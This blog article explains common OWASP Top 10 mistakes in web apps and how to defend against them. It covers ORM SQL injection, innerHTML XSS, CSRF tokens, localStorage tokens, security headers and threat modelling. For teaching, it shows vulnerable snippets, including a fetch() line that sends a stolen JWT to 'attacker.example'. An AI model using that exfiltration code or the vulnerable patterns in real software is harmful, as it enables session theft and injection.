Introduction: Why OWASP Top 10 Mistakes Still Matter
Even in 2025, I still see teams tripping over the same OWASP Top 10 mistakes that were already well-known a decade ago. Modern frameworks, cloud platforms, and security tooling have raised the bar, but they’ve also created a dangerous illusion that “the framework has it handled”—until a pentest or real incident proves otherwise.
In my experience reviewing application security for product teams, the root cause is rarely a lack of documentation. It’s usually a mix of tight deadlines, copy‑pasted patterns, and partial understanding of how the OWASP Top 10 actually maps to real code and real misconfigurations. The result: injection flaws hidden in convenience libraries, broken access control behind feature flags, and sensitive data exposed through misconfigured APIs.
This article breaks down the OWASP Top 10 mistakes I still see engineers make, what they look like in day‑to‑day development, and how to avoid them without slowing delivery. If you build or review web applications, treating these as “solved problems” is itself one of the biggest risks.
OWASP Top 10 – 2021 Official Introduction and Overview
1. Assuming the ORM Automatically Stops All SQL Injection
One of the OWASP Top 10 mistakes I still encounter is the blind belief that “we use an ORM, so SQL injection is impossible.” ORMs and parameterized queries dramatically reduce risk, but they don’t make unsafe patterns magically safe. The moment raw queries, string concatenation, or dynamic filtering slip in, the protection can evaporate.
In reviews I’ve done for fast‑moving product teams, I’ve seen engineers mix safe ORM calls with just one or two “quick” string-built queries for reporting or search—and those are exactly where injection bugs show up.
How ORMs Get Bypassed in Real Projects
Most issues appear when developers step outside the happy path of simple CRUD:
- Building raw SQL with string concatenation for complex reports or dashboards.
- Using ORM helpers but injecting user input into ORDER BY, LIMIT, or column names without validation.
- Relying on unsafe query builder escape hatches like raw() or nativeQuery and assuming they’re still parameterized.
Here’s the contrast I point out when training teams:
# Safe: parameterized ORM query (SQLAlchemy shown)
from sqlalchemy import text

user = db.session.execute(
    text("SELECT * FROM users WHERE email = :email"),
    {"email": user_email},
).first()

# Dangerous: string concatenation with user input
query = f"SELECT * FROM users WHERE email = '{user_email}'"  # vulnerable if user_email is untrusted
user = db.session.execute(text(query)).first()  # text() does not help once input is baked into the string
The second pattern is exactly how SQL injection creeps back into a codebase that “uses an ORM everywhere.”
Safer Patterns I Rely On
What has worked best for me is treating the ORM as a tool, not a guarantee:
- Enforce parameterized queries by convention and code review—no exceptions for “quick hacks.”
- Allow raw SQL only in well-documented, isolated modules with extra scrutiny and tests.
- Whitelist allowed values for dynamic sort fields, filters, and pagination instead of injecting them directly into SQL.
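That last point, whitelisting dynamic sort fields, can be sketched in a few lines of Python (a minimal illustration; the column mapping and helper name are mine, not from any particular framework):

```python
# Minimal sketch: whitelist dynamic sort fields instead of
# interpolating user input into SQL. Column names cannot be
# bound as query parameters, so they must come from a fixed mapping.
ALLOWED_SORT_COLUMNS = {
    "email": "email",
    "created": "created_at",
    "name": "full_name",
}

def build_order_by(requested: str) -> str:
    """Return a safe ORDER BY column, falling back to a default."""
    return ALLOWED_SORT_COLUMNS.get(requested, "created_at")

# The final SQL only ever contains values we control:
column = build_order_by("email")            # known column
column = build_order_by("1; DROP TABLE--")  # falls back to the default
```

Because user input can only select among predefined values, it never reaches the query as a column name, no matter what the client sends.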
When I help teams audit for OWASP Top 10 mistakes, I specifically search for raw query helpers and string concatenation around SQL. It’s usually the fastest way to uncover hidden injection risks that everyone assumed the ORM had already solved.
SQL Injection Prevention – OWASP Cheat Sheet Series
2. Relying on Output Escaping Alone to Prevent XSS
Another of the classic OWASP Top 10 mistakes I still see is assuming that “our templating engine auto-escapes everything, so we’re safe from XSS.” Auto-escaping is hugely valuable, but it only protects certain contexts, and it completely falls apart once data hits unsafe sinks like innerHTML, client-side rendering frameworks, or user-controlled HTML blocks.
When I audit frontends, the pattern is almost always the same: server-side templates are mostly fine, but the real risk lives in JavaScript where developers bypass the safe defaults for just a bit more flexibility or speed.
Where Auto-Escaping Quietly Stops Helping
Some common ways I’ve seen teams reintroduce XSS despite using “safe” templating:
- Assigning user input directly into innerHTML, outerHTML, or document.write.
- Using client-side frameworks but dropping down to dangerouslySetInnerHTML, v-html, or equivalent unsafe APIs.
- Embedding user-controlled strings into event handlers (e.g., onclick attributes) or into script blocks.
Here’s a simple example I’ve used in training sessions to show how easy it is to bypass otherwise safe rendering:
// Backend template engine auto-escapes {{ comment }} - usually safe.
// Later in the frontend, someone adds:
const userComment = getUserComment(); // untrusted input
document.getElementById('comment').innerHTML = userComment; // XSS risk
// Safer: use textContent when you don't truly need HTML
// document.getElementById('comment').textContent = userComment;
That one innerHTML line can completely undermine a carefully configured templating system.
Defense-in-Depth Patterns That Actually Work
The approach that’s worked best for me is to treat auto-escaping as the first layer, not the only one:
- Default to textContent or equivalent safe APIs for DOM updates; only use HTML when there is a real requirement.
- Sanitize any intentionally allowed HTML with a well-maintained, battle-tested HTML sanitizer, not ad hoc regexes.
- Combine this with a tight Content Security Policy (CSP) to limit the impact of any XSS that slips through.
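On the server side, the same layered mindset applies. As a small illustration with the Python standard library (this covers HTML element content only; URLs, attributes, and script contexts each need their own encoding rules, and intentionally allowed HTML still needs a real sanitizer):

```python
from html import escape

# Minimal sketch: escape untrusted input before it lands in an
# HTML element context, as a backstop alongside template auto-escaping.
user_comment = '<img src=x onerror=alert(1)>'
safe = escape(user_comment)  # angle brackets and quotes become entities
```

This is one defensive layer, not a complete fix: it does nothing once a frontend later pushes the raw value into innerHTML, which is exactly why the safe-sink and CSP layers above still matter.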
When teams review their frontends with this mindset, they start spotting XSS risks in places they previously assumed their templates had covered, and that’s where real progress against the OWASP Top 10 mistakes begins.
3. Misconfiguring SameSite and CSRF Tokens
CSRF used to be an obvious checkbox: add a hidden token in forms and call it a day. In 2025, with browser-level SameSite protections and complex SPA backends, I actually see more subtle CSRF bugs, not fewer. Teams think “SameSite=Lax is on, so we’re covered,” while missing weak token scopes, missing protections on APIs, or edge cases with cross-domain redirects.
In my own reviews of modern React/Vue/Angular apps, the riskiest cases are hybrid setups: some legacy server-rendered forms, some JSON APIs, some third-party SSO flows. That mix is exactly where misconfigured SameSite and half-implemented CSRF tokens leave gaps.
Where SameSite and Tokens Commonly Go Wrong
These are patterns I routinely flag as OWASP Top 10 mistakes:
- Relying on SameSite=Lax cookies alone while exposing state-changing JSON endpoints without any CSRF token.
- Issuing CSRF tokens but not validating them on all unsafe methods (e.g., protecting POST but forgetting PATCH/DELETE).
- SPAs that store auth in cookies, but omit CSRF headers for XHR/fetch requests or forget to rotate tokens on login.
This stripped-down example shows the difference a token makes for a state-changing endpoint:
# Vulnerable: no CSRF token validation, cookie-based auth only
POST /api/settings
Cookie: session=abc123

# Safer pattern: include and verify a CSRF token header
POST /api/settings
Cookie: session=abc123
X-CSRF-Token: 9f2b7...
On the server side, I always ensure the CSRF token is bound to the user session and verified for every mutating request.
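A session-bound token check can be sketched in Python like this (a minimal illustration; the key handling and function names are assumptions, and real apps should prefer their framework's built-in CSRF support where available):

```python
import hashlib
import hmac
import secrets

# Minimal sketch: derive the CSRF token from the session ID with a
# keyed hash, so a token stolen from one session is useless in another.
# SECRET_KEY handling here is illustrative; real apps load a persistent secret.
SECRET_KEY = secrets.token_bytes(32)

def issue_csrf_token(session_id: str) -> str:
    """Return a CSRF token bound to this specific session."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()

def verify_csrf_token(session_id: str, token: str) -> bool:
    """Compare in constant time to avoid timing side channels."""
    return hmac.compare_digest(issue_csrf_token(session_id), token)
```

On every unsafe method, the server recomputes the expected token for the requester's session and rejects the request on mismatch; a token replayed against a different session fails the check.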
Practical Hardening Steps for SPAs and APIs
What has worked best for me in real projects is a combination of browser features and app-level defenses:
- Set cookies with SameSite=Lax or Strict, Secure, and HttpOnly, but treat SameSite as a mitigation, not the main CSRF control.
- Issue a session-bound CSRF token and send it via a custom header on all unsafe HTTP methods (POST, PUT, PATCH, DELETE).
- For SPAs, fetch the CSRF token from a same-origin, cookie-authenticated endpoint and keep its usage centralized in the HTTP client layer.
When I walk teams through these changes, we usually discover at least one critical endpoint that was assumed “safe because of SameSite,” but in reality had no real CSRF protection at all—exactly the kind of subtle gap that still shows up in OWASP Top 10 mistakes.
Cross-Site Request Forgery Prevention – OWASP Cheat Sheet Series
4. Trusting Frontend Validation to Enforce Security Rules
One OWASP Top 10 mistake I still see in code reviews is treating frontend validation as if it were a security control. Nice UX is valuable, but JavaScript checks, HTML5 constraints, and disabled buttons only protect honest users. Attackers bypass them in seconds with browser dev tools, custom scripts, or direct API calls.
Why Client-Side Checks Are Only Hints
In my own projects, the most painful bugs came from assuming “the form already enforces this” for things like max amounts, allowed roles, or read-only fields. Once someone hits the API directly, those rules vanish unless the backend re-checks them.
- Input constraints (length, format, ranges) must be validated server-side.
- Business rules (discount limits, transfer caps) must be enforced in backend logic.
- Authorization (who can update which record) must be checked against server-side permissions, never just hidden UI.
Here’s the rule of thumb I use: anything that would matter during an incident review belongs on the server. The frontend can guide, but the backend must decide.
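As a sketch of that principle, here is what re-checking a business rule server-side might look like in Python (the cap, role names, and function are illustrative, not a real API):

```python
# Minimal sketch: re-validate business rules on the backend,
# regardless of what the frontend form allowed or disabled.
TRANSFER_CAP = 10_000  # illustrative limit

def validate_transfer(amount: float, user_role: str) -> None:
    """Raise ValueError if the request violates server-side rules."""
    if amount <= 0:
        raise ValueError("amount must be positive")
    if amount > TRANSFER_CAP and user_role != "admin":
        raise ValueError("amount exceeds transfer cap")

validate_transfer(500, "user")  # passes
try:
    # Rejected server-side even if the UI "prevented" it.
    validate_transfer(50_000, "user")
except ValueError:
    pass
```

The frontend can mirror the same rule for good UX, but only this backend check survives a direct API call.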
5. Storing Sensitive Tokens in Local Storage or JS-Readable Cookies
Putting JWTs or session identifiers in localStorage or JavaScript-readable cookies is still one of the most stubborn OWASP Top 10 mistakes I encounter. On paper it seems convenient for SPAs; in practice, it dramatically raises the impact of any XSS bug, turning a minor issue into full account takeover.
When I’ve helped teams analyze incidents, the story is often the same: a small XSS in a rarely-used page becomes critical because an attacker can simply read localStorage.token or grab a non-HttpOnly cookie and replay it.
How XSS Turns Into Silent Session Theft
Any time a token is accessible via JavaScript, an attacker who finds XSS can usually steal it with one line of code. I often show engineers a simplified example like this:
// Insecure pattern: token in localStorage
localStorage.setItem('authToken', jwt);

// If XSS exists anywhere on the origin, attacker can do:
const stolen = localStorage.getItem('authToken');
fetch('https://attacker.example/steal', {
  method: 'POST',
  body: stolen
});
The same applies to cookies without the HttpOnly flag; any injected script can read document.cookie and exfiltrate session identifiers.
Safer Patterns I Use for SPAs
In my own SPA architectures, I treat tokens as high-value secrets and minimize their exposure:
- Prefer a server-side session with a Secure, HttpOnly, SameSite cookie rather than a long-lived JWT in localStorage.
- If JWTs are required, keep them in-memory only (never persisted) and rotate/shorten lifetimes aggressively.
- Combine HttpOnly cookies with CSRF protections and a strict CSP to reduce both theft and exploitability.
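The cookie attributes from the first point can be illustrated with Python's standard library (a minimal sketch of the Set-Cookie value; a real app would set these through its framework's session/cookie API):

```python
from http.cookies import SimpleCookie

# Minimal sketch: a session cookie with the attributes that keep it
# out of reach of page JavaScript and off plain-HTTP connections.
cookie = SimpleCookie()
cookie["session"] = "abc123"
cookie["session"]["httponly"] = True   # not readable via document.cookie
cookie["session"]["secure"] = True     # only sent over HTTPS
cookie["session"]["samesite"] = "Lax"  # limits cross-site sends

header_value = cookie["session"].OutputString()
```

With HttpOnly set, the localStorage-theft pattern shown above simply has nothing to read; an XSS can still act on the user's behalf in-page, which is why CSP and CSRF defenses remain necessary.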
When I walk teams through this trade-off, most realize the convenience of localStorage isn’t worth turning every XSS into a guaranteed account compromise—exactly the kind of risk that keeps appearing in OWASP Top 10 mistakes.
JWT Security Best Practices | Curity
6. Treating Security Headers as Optional Hardening
Many teams still treat security headers as “nice-to-have extras” instead of core defenses, which is why missing or weak headers keep showing up among OWASP Top 10 mistakes. When I review production apps, it’s common to see strong auth and decent code, but no CSP, no HSTS, and permissive framing—leaving unnecessary exposure to XSS, protocol downgrade, and clickjacking.
Small Headers, Big Risk Reduction
In my own deployments, simply tightening a few headers has massively reduced the blast radius of bugs:
- Content-Security-Policy (CSP) limits where scripts and resources can load from, often turning an exploitable XSS into a blocked request.
- Strict-Transport-Security (HSTS) forces HTTPS, protecting users from downgrade and some man-in-the-middle tricks.
- X-Frame-Options or frame-ancestors in CSP prevents clickjacking by blocking hostile framing.
Here’s a simple baseline I often recommend in nginx or similar:
add_header Content-Security-Policy "default-src 'self'" always;
add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always;
add_header X-Frame-Options "DENY" always;
These headers won’t fix bad code, but in my experience they frequently turn a serious exploit into a blocked or much harder attack path—well worth treating as mandatory, not optional.
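For teams that prefer to enforce the same baseline at the application layer rather than in nginx, a small WSGI-style middleware sketch works too (the class and header values here are illustrative, not a library API):

```python
# Minimal sketch: append a baseline of security headers to every
# response, so no endpoint ships without them by accident.
SECURITY_HEADERS = [
    ("Content-Security-Policy", "default-src 'self'"),
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("X-Frame-Options", "DENY"),
]

class SecurityHeadersMiddleware:
    """Wrap any WSGI app and add the baseline headers on the way out."""

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        def _start_response(status, headers, exc_info=None):
            return start_response(status, headers + SECURITY_HEADERS, exc_info)
        return self.app(environ, _start_response)

def demo_app(environ, start_response):
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"ok"]

app = SecurityHeadersMiddleware(demo_app)
```

Centralizing the headers in one place, whether proxy config or middleware, is the point: individual handlers can no longer forget them.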
7. Mapping OWASP Top 10 to Features, Not to Threat Models
One of the most subtle OWASP Top 10 mistakes I see is treating the list as a compliance checklist: “SQL injection? We use an ORM, check. XSS? We auto-escape, check.” That mindset maps controls to features, not to the actual ways your system can be attacked. In my experience, this is how teams end up with beautiful dashboards of “green checks” while critical business flows are still exposed.
When I sit with product teams, I rarely start with the Top 10 itself. I start with questions like: which actions move money, expose personal data, change ownership, or escalate privileges? The threats to those flows should drive which OWASP Top 10 categories really matter and where to invest effort.
From Checkbox Security to Flow-Centric Thinking
A feature-first view sounds like this: “we added CSRF tokens to all forms” or “we turned on CSP.” A threat-model view sounds more like: “we identified that account recovery is a high-value target, so we hardened it against brute force, token theft, and XSS-based takeover.”
- Start by mapping critical business flows: login, payments, admin changes, data exports.
- Identify assets and actors: what data is valuable, who might attack, and from where.
- Overlay relevant OWASP Top 10 categories onto each flow, not onto each UI screen.
For example, the same login endpoint might be affected by broken authentication, injection in logging, sensitive data exposure, and misconfigured security headers—all at once. A checklist rarely shows that intersection; a threat model does.
Lightweight Threat Modeling I Actually Use
Most teams I work with don’t have time for heavyweight modeling, so I lean on a simple, repeatable pattern during design reviews:
- Whiteboard a single high-risk user journey (e.g., “change email,” “approve invoice”).
- Ask “what if an internal user abused this?” and “what if an external attacker abused this?”
- List concrete risks (XSS, IDOR, CSRF, privilege escalation) and link them back to specific OWASP Top 10 items.
Once that’s written down, it becomes obvious which defenses are must-have and which are nice-to-have. Over time, these small, focused threat-model sessions have given my teams far better coverage than any Top 10 checklist alone.
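The output of one of these sessions can be captured in a tiny structured record so it survives past the whiteboard (a sketch; the field names and example values are illustrative):

```python
from dataclasses import dataclass, field

@dataclass
class FlowThreatModel:
    """One high-risk user journey and the risks mapped onto it."""
    flow: str
    actors: list = field(default_factory=list)
    risks: list = field(default_factory=list)        # concrete risks, e.g. "CSRF", "IDOR"
    owasp_items: list = field(default_factory=list)  # linked Top 10 categories

# Example record from a session on the "change email" journey:
model = FlowThreatModel(
    flow="change email",
    actors=["external attacker", "malicious insider"],
    risks=["CSRF", "XSS-based takeover", "brute force on confirmation"],
    owasp_items=["A01 Broken Access Control", "A07 Identification and Authentication Failures"],
)
```

Even a record this small makes the flow-to-risk mapping reviewable in pull requests, which is where checkbox thinking tends to creep back in.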
Threat Modeling – OWASP Cheat Sheet Series
Conclusion: Turning OWASP Top 10 Mistakes into a Secure-by-Default Practice
Across real projects, what I’ve learned is that OWASP Top 10 mistakes rarely come from ignorance of the list—they come from unsafe defaults, rushed decisions, and treating security as an add-on instead of a design constraint. The good news is that small, consistent habits make a huge difference.
Here’s the concise checklist I keep coming back to when I’m helping teams secure web apps:
- Access control: Enforce authorization on the server, with least privilege and clear role boundaries.
- Data handling: Use parameterized queries, output encoding, and strict validation on the backend for all inputs.
- Sessions & tokens: Prefer HttpOnly, Secure, SameSite cookies; avoid localStorage for sensitive tokens.
- CSRF & SameSite: Treat SameSite as a defense-in-depth layer, not a replacement for robust CSRF tokens.
- Client vs server rules: Never rely on frontend checks for anything that impacts security or money.
- Security headers: Ship a solid baseline CSP, HSTS, and frame protections by default.
- Threat modeling: Tie OWASP Top 10 risks to critical user flows and business impact, not just to features.
If teams bake these principles into their frameworks, templates, and review checklists, “secure-by-default” stops being a slogan and becomes the normal way we write web code—dramatically reducing how often OWASP Top 10 mistakes show up in production.

Hi, I’m Cary Huang — a tech enthusiast based in Canada. I’ve spent years working with complex production systems and open-source software. Through TechBuddies.io, my team and I share practical engineering insights, curate relevant tech news, and recommend useful tools and products to help developers learn and work more effectively.
